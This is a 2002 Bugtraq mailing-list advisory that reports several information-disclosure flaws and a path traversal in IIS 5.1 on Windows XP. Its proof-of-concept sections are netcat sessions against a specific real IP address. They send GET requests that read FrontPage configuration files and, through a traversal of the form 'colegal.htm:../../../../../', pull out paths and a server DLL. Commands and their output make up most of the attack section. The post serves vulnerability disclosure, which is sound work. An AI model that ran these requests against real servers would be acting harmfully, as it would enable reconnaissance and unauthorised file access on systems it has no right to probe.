[24241] in bugtraq
This is the CORRECTED POST please ignore the one befor same subject MULTIPLE Remote Issues with II5.1 on Windows XP
daemon@ATHENA.MIT.EDU (Adonis.No.Spam)
Mon Feb 11 18:14:36 2002
From: "Adonis.No.Spam" <adonis1@videotron.ca>
To: "BUGTRAQ" <BUGTRAQ@securityfocus.com>
Date: Sun, 10 Feb 2002 21:29:36 -0500
Message-ID: <NABBLFLGLEPDLCCJPIOAOEDPECAA.adonis1@videotron.ca>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
.---------------.
/ NtWaK0 Advisory \
+---------------------------------------------------------------------------
.
:
Affected : Windows XP with IIS 5.1
:
Type : MULTIPLE Remote Issues
:
Type : Remote/ Local Security Issues
:
Date : 10-02-2002
:
Author : NtWaK0 @ www.SafeHack.com
:
Credit : NtWaK0 @ www.SafeHack.com
:
+---------------------------------------------------------------------------
.
+--------------------.
Remote/Local Expoit \
+----------------------`----------------------------------------------------
.
:
+-----------. * * * www.SafeHack.com * * *
:
Disclaimer \
:
+-------------`-------------------------------------------------------------
.
:
This material is presented for informational and entertainment purposes
:
only, and to satisfy the curious. Any activities described in this file
:
which involve vandalism, theft, or any other illegal activities are
:
recounted from third-party conversations. I do not condone or encourage
:
vandalism or theft. I do not accept any liability for anything anyone
:
does with this information. So, don't shoot the messenger.
:
Remember: Use a computer in ways that ensure respect for your fellows.
:
:
+-------.
:
T.O.C. \
:
+---------`-----------------------------------------------------------------
.
:
:
[ Brief History . . . . . . . . . . . . . . . . . . . . . .line 40 ]
:
:
[ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 60 ]
:
:
[ The Solution . . . . . . . . . . . . . . . . . . . . . .line 156 ]
:
:
+-------------.
:
Brief History \
:
+---------------`-----------------------------------------------------------
.
I had the chance to play for couple of hours with IIS 5.1 on a friend Box,
:
thanks to Recon. While I was trying some stuff on IIS 5.1 I MANY problems
:
with default IIS 5.1 installation and on files installed by default.
:
:
This one is not the same as the one reported earlier. The one reported
:
before had to deal with "GET /_vti_bin/shtml.dll".
:
A copy of it can be found at :
:
http://www.safehack.com/Advisory/shtmldump.txt
:
:
+-------+
:
Test OS
:
+-------+
:
Tested on Windows XP with IIS 5.1
:
:
:
Please continue to read for more details.
:
:
+-----------.
:
The Problem \
:
+-------------`-------------------------------------------------------------
.
:
>>> 1- Issue <<<
:
:
Identify WEB DIR installation. By sending this "GET /_vti_pvt/access.cnf"
:
you can identify the web installation. As we all know this is a helpfull
:
peace of information if someone is going to attack your web site.
:
:
>>> Proof-Of-Concept <<<
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /_vti_pvt/access.cnf
:
vti_encoding:SR|utf8-nl
:
RealmName:LAMER
:
InheritPermissions:false
:
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt
:
:
Their is another security issue with this too. "InheritPermissions:false"
:
This will tell security inheritance of that folder.
:
:
>>> 2- Issue <<<
:
>>> Proof-Of-Concept <<<
:
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /_vti_pvt/botinfs.cnf
:
:
vti_encoding:SR|utf8-nl
:
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\
:
40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar
:
:
>>> 3- Issue <<<
:
:
>>> Proof-Of-Concept <<<
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /_vti_pvt/bots.cnf
:
vti_encoding:SR|utf8-nl
:
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared
:
\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf
:
vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft
:
\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar
:
\\\\fp4Avnb.dll
:
:
>>> 4- Issue <<<
:
Using GET /iishelp/common/colegal.htm you can access other files. under the
:
web structure. I did not have chance to test it on file above the
:
web structure. Like I said I do not run IIS 5.1 but a friend does.
:
One of these days I am going to buy more memory for some of my old box and
:
slap on it IIS 5.1 to be able to do better test.
:
:
>>> Proof-Of-Concept <<<
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf
:
vti_encoding:SR|utf8-nl
:
RealmName:LAMER
:
InheritPermissions:false
:
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt
:
:
writeto.cnf [Extracted From]
:
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/
:
prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp
:
:
Back links for files that can be written to by users of the web, such as
:
Save Results Form handler result files. Files that can be written to by
:
users of the web have a looser security setting than regular web content.
:
:
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll
:
MZÉ ? ? + @a ??¦? ¦ -!+?L-!This program cannot be run in DOS mode.
:
$ §-Q+Q¦?ïQ¦?ïQ¦?ï3¼,ïU¦?寮5ïT¦?ïQ¦>ïF¦?ïT¦9ïP¦?寮4ïS¦?寮;ïU¦?ïRichQ¦?ï
:
PE L?? _; a ?!??? ? 0 c? ? µg ? ? ? ?
:
P ? ¿- ? ? ? ? ? ? ? » (? P 0 P?
:
:
:
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /_vti_pvt/linkinfo.cnf
:
vti_encoding:SR|utf8-nl
:
javascript\:loadhelpfront();:localstart.asp
:
javascript\:activate(<%=iver%>);:localstart.asp
:
http\://www.safehack.com:index.htm
:
/iishelp/common/colegal.htm:localstart.asp
:
:
:
:
NOTE: A search on google for "writeto.cnf" Returned alarmed results
:
http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta=
:
:
:
+------------.
:
The Solution \
:
+--------------`------------------------------------------------------------
.
No idea. Vendor was informed.
:
If you are going to use the founded issues, credit must be given to the
:
author. NtWaK0 @ www.safehack.com
:
+---------------------------------------------------------------------------
.
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV
w0aAHeJqCi7MoCs62m5AR8dm
=u7kB
-----END PGP SIGNATURE-----
________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good www.SafeHack.com |
Je Pense, Donc Je Suis \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :) --(")--
RFCs are meant to be read and followed…:) /`\ NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow -=-
